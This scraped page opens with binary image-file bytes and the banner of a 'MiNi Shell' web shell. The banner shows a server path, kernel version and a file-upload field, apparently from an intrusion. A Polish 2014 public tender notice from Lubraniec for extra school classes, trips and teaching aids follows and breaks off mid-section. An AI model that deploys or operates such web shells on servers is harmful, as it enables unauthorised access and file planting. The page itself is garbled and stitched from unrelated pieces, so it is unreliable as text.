JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141006/210455-N-2014.html

<p class="kh_header"><b>Lubraniec: Świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć dodatkowych, wyjazdów edukacyjnych  oraz dostawy pomocy dydaktycznych</b><br>
<b>Numer ogłoszenia: 210455 - 2014; data zamieszczenia: 06.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół i Przedszkola Samorządowego Gminy i Miasta w Lubrańcu , ul. Brzeska 49, 87-890 Lubraniec, woj. kujawsko-pomorskie, tel. 0-54 2862013 w. 35, faks 0-54 2862498.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć dodatkowych, wyjazdów edukacyjnych  oraz dostawy pomocy dydaktycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć dodatkowych, wyjazdów edukacyjnych  oraz dostawy pomocy dydaktycznych w okresie od dnia podpisania umowy do 30 czerwca 2015 r., w ramach projektu Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych w Gminie Lubraniec współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX POKL.

Zajęcia dydaktyczne zostaną zrealizowane dla uczniów klas I-III szkół gimnazjalnych w Gminie Lubraniec, zgodnie z poniższym wykazem:

1.	Gimnazjum w Kłobi

- Zajęcia w zakresie nauk matematyczno-przyrodniczych 1 gr.  x 30h
- Zajęcia z języka niemieckiego 1 gr. x 30h
- Zajęcia z Technologii Informacyjno-Komunikacyjnej 1 gr. x 30h
- Zajęcia warsztatowe z zakresu ekologii w życiu codziennym 1 gr. x 30h + wykład pt.: Działania proekologiczne w naszej gminie (4h) x1 dla 27 U
- Zajęcia z przedsiębiorczości 1 gr.  x 20 h
- Zajęcia w ramach tożsamości regionalnej i wychowanie patriotyczne 2 gr. x 15h
- Zajęcia plenerowe - wyjazd do Muzeum Ziemi Kujawskiej w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne  dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Kłobia - Włocławek - Kłobia (łącznie 60 km); termin wykonania zamówienia: październik 2014r.;
- Zajęcia plenerowe - wyjazd do Parku Etnograficznego w Kłóbce w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Kłobia - Kłóbka - Kłobia (łącznie 80 km); termin wykonania zamówienia: kwiecień 2015r.
- Zajęcia w ramach rozwoju kompetencji w zakresie świadomości i ekspresji kulturalnej 1 gr.  x 10h
- Warsztaty grupowe z zakresu doradztwa edukacyjno-zawodowego 3 gr. x 10h
- Zajęcia przygotowujące do egzaminu gimnazjalnego w zakresie języków obcych 1 gr.  x 30h
- Zajęcia rozwijające: sportowe 2 gr.  x 30h
- Zajęcia dla uczniów niepełnosprawnych 1 gr.  x 30h

2. Gimnazjum w Lubrańcu
- Zajęcia w zakresie nauk matematyczno-przyrodniczych 2 gr. x 30h
- Zajęcia z języka angielskiego 2 gr. x 30h
- Zajęcia z języka niemieckiego 1 gr. x 30h
- Zajęcia z Technologii Informacyjno-Komunikacyjnej 2 gr. x 30h
- Zajęcia warsztatowe z zakresu ekologii w życiu codziennym 1 gr. x 20h + wykład pt.: Działania proekologiczne w naszej gminie (4h) x1 dla 30U
- Zajęcia z przedsiębiorczości 1 gr. x 20h
- Zajęcia w ramach tożsamości regionalnej i wychowanie patriotyczne 2 gr. x 15h
- Zajęcia plenerowe - wyjazd do Muzeum Ziemi Kujawskiej w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne  dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Lubraniec - Włocławek - Lubraniec (łącznie 60 km); termin wykonania zamówienia: październik 2014r.
- Zajęcia plenerowe - wyjazd do Parku Etnograficznego w Kłóbce w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Lubraniec - Kłóbka - Lubraniec (łącznie 80 km); termin wykonania zamówienia: maj 2015r.
- Zajęcia w ramach rozwoju kompetencji w zakresie świadomości i ekspresji kulturalnej 1gr. x 10h
- Warsztaty grupowe z zakresu doradztwa edukacyjno-zawodowego 3 gr. x  10h
- Zajęcia przygotowujące do egzaminu gimnazjalnego w zakresie nauk mat-przyr. 2 gr. x 30h
- Zajęcia przygotowujące do egzaminu gimnazjalnego w zakresie języków obcych 2 gr. x 30h
- Zajęcia wyrównawcze z języka polskiego 1 gr. x 30h
- Zajęcia wyrównawcze z matematyki 1 gr. x 30
- Zajęcia wyrównawcze z języka angielskiego 1 gr. x 30h
- Zajęcia wyrównawcze z języka niemieckiego 1 gr. x 30h
- Zajęcia rozwijające: muzyczne 2gr. x 30h
- Zajęcia rozwijające: sportowe 2 gr. x 30h

3. Gimnazjum w Siemnówku
- Zajęcia w zakresie nauk matematyczno-przyrodniczych 2 gr. x 30h
- Zajęcia z języka angielskiego 1 gr. x 30h
- Zajęcia z języka niemieckiego 1gr. x 30h
- Zajęcia z Technologii Informacyjno-Komunikacyjnej 2 gr. x 30h
- Zajęcia z przedsiębiorczości 1 gr. x 20h
- Zajęcia plenerowe - wyjazd edukacyjny do  Banku Spółdzielczego w Lubrańcu w ramach zajęć z przedsiębiorczości dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu:  Siemnówek - Lubraniec - Siemnówek (łącznie 20 km); termin wykonania zamówienia: październik 2014r
- Zajęcia w ramach tożsamości regionalnej i wychowanie patriotyczne 2 gr. x 15h
- Zajęcia plenerowe - wyjazd do Muzeum Ziemi Kujawskiej w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne  dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Siemnówek - Włocławek - Siemnówek (łącznie 60 km); termin wykonania zamówienia: marzec 2015r.
- Zajęcia plenerowe - wyjazd do Parku Etnograficznego w Kłóbce w ramach zajęć w zakresie rozwoju tożsamości regionalnej i wychowanie patriotyczne dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu: Siemnówek - Kłóbka - Siemnówek (łącznie 80 km); termin wykonania zamówienia: kwiecień 2015r.
- Zajęcia w ramach rozwoju kompetencji w zakresie świadomości i ekspresji kulturalnej 2 gr. x10h
- Zajęcia plenerowe - wyjazd do teatru w Toruniu w ramach zajęć w zakresie kompetencji w zakresie świadomości i ekspresji kulturalnej dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu:  Siemnówek - Toruń - Siemnówek (łącznie 200 km); termin wykonania zamówienia: listopad 2014r.
- Zajęcia plenerowe - wyjazd do teatru w Bydgoszczy w ramach zajęć w zakresie kompetencji w zakresie świadomości i ekspresji kulturalnej dla 45 uczniów + 2 opiekunów + kierownik wycieczki; trasa wyjazdu:  Siemnówek - Bydgoszcz - Siemnówek (łącznie 260 km); termin wykonania zamówienia: marzec 2015r.
- Warsztaty grupowe z zakresu doradztwa edukacyjno-zawodowego 3 gr. x 10h
- Zajęcia przygotowujące do egzaminu gimnazjalnego w zakresie nauk mat-przyr. 3 gr. x 30h
- Zajęcia przygotowujące do egzaminu gimnazjalnego w zakresie języków obcych 2 gr. x 30h
- Zajęcia dla uczniów z dysleksją 1 gr. x 30h
- Zajęcia rozwijające: taneczne 1 gr. x 30h

Zajęcia mogą być prowadzone wyłącznie przez kadrę posiadającą kwalifikacje do prowadzenia zajęć zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 kwietnia 2012 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli.

Wymagania szczegółowe związane z realizacją zajęć dydaktycznych:

- Wykonawca ma obowiązek realizacji zajęć zgodnie z celem głównym i celami szczegółowymi projektu.
- Zamawiający wymaga, aby prowadzenie zajęć w ramach projektu odbywało się od poniedziałku do piątku; w szczególnych i uzasadnionych przypadkach także w soboty, na terenie szkoły, której dotyczą poszczególne części przedmiotu zamówienia. 
- Zajęcia realizowane mają być w godzinach nie kolidujących z godzinami zajęć obowiązkowych uczniów. 
- Wykonawca ma obowiązek w terminie 10 dni od daty zawarcia umowy przedstawić harmonogram zajęć do akceptacji dyrektorowi szkoły.
- Wykonawca zobowiązuje się do opracowania w terminie 10 dni od daty zawarcia umowy programu zajęć osobnego dla każdej grupy szkoleniowej i przedstawienia do akceptacji dyrektorowi szkoły.
- Wykonawca zobowiązany jest do prowadzenia dzienników zajęć zawierających informację dotyczącą frekwencji uczniów oraz tematykę prowadzonych zajęć zgodnie z wzorem zaakceptowanym przez Zamawiającego.
- Wykonawca zobowiązany jest do bieżącego monitorowania efektów zajęć i raportowanie o stanie realizacji zajęć.
- Wykonawca zobowiązany jest do informowania dyrektora szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
- Wykonawca zobowiązany jest do zaspokojenia potrzeb chłopców i dziewcząt bez ograniczeń wynikających z płci - obowiązek uwzględniania w trakcie zajęć zasady równości szans w przekazywanych treściach.
- Wykonawca zobowiązany jest do prowadzenia promocji projektu informowania o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego.
- Wykonawca zobowiązany jest do bieżącej weryfikacji postępów uczniów w nauce, końcowym efektem weryfikacji będzie indywidualna opisowa ocena ucznia i/lub ankieta sprawdzająca wiedzę i/lub test kompetencji przygotowana(y) oraz przeprowadzona(y) przez Wykonawcę i przekazana(y) Zamawiającemu po zakończeniu zajęć.   
-Wykonawca w ramach organizowanych wykładów pt.: Działania proekologiczne w naszej gminie zobowiązany będzie również do: zapewnienia cateringu (kawa, herbata, woda mineralna, wrzątek w termosie, cukier, cytryna, śmietanka do kawy. Na jednego uczestnika powinno przypadać minimum: woda mineralna + kawa lub herbata z cukrem/cytryną /śmietanką (500ml/os). Wykonawca zobowiązany jest do dostarczenia jednorazowych naczyń, jednorazowych sztućców, termosów, dla określonej liczby osób; zapewnienia materiałów szkoleniowych (prezentacja multimedialna).

W ramach wyjazdów edukacyjnych Wykonawca zobowiązany będzie w szczególności do:

-Sporządzenia szczegółowych harmonogramów i programów wyjazdów edukacyjnych,
-Realizacji przedmiotu umowy zgodnie ze złożoną ofertą, SIWZ oraz zatwierdzonymi szczegółowymi harmonogramami i programami wyjazdów edukacyjnych,
-Sporządzania innych wskazanych przez Zamawiającego dokumentów niezbędnych dla potrzeb realizacji projektu (karta wycieczki, lista obecności),
-Zapewnienia opieki wychowawców,
-Zapewnienie dojazd i przejazd środkami transportu (autokary), sprawnymi technicznie  dopuszczonymi do ruchu i odpowiadającymi wymaganiom ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2013r poz. 1414 z późn. zm.) tj. posiadającymi aktualny przegląd techniczny i ubezpieczenie; wyposażonymi w  sprawną klimatyzację, spełniające wszystkie wymogi bezpieczeństwa, z dostosowaną liczbą miejsc siedzących dla każdego uczestnika;
-Zapewnienia obsługi środków transportu  - osoby posiadające odpowiednie uprawnienia do kierowania pojazdami; 
-Ubezpieczenia wszystkich uczestników wycieczki NNW; 
-Pokrycia wszystkie wymagane koszty opłat drogowych i parkingowych; 
-Zapewnienia biletów wstępu do atrakcji turystycznych/miejsc dla wszystkich uczestników wycieczki;   
-Zapewnienia wcześniejszej rezerwacji wstępu do zwiedzanych miejsc;
-Zapewnienia wyżywienia dla każdego uczestnika wycieczki (prowiant + 1 ciepły posiłek);
-Zapewnienia zastępczego środka transportu w przypadku awarii  celem uniknięcia opóźnień.
Dostawa materiałów dydaktycznych zgodnie z siwz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 63.51.10.00-4, 39.16.22.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium w tym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się  o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - należycie zrealizowali minimum trzy zamówienia o wartości minimum 150 000,00 zł każde, polegające na realizacji zajęć dydaktycznych dla szkół (minimum 3 zajęcia w każdym zamówieniu) oraz dostawie pomocy dydaktycznych.
W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz usług i dostaw, sporządzony według propozycji stanowiącego Załącznik Nr  5 do SIWZ, z załączeniem dowodów czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się  o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się  o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się  o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
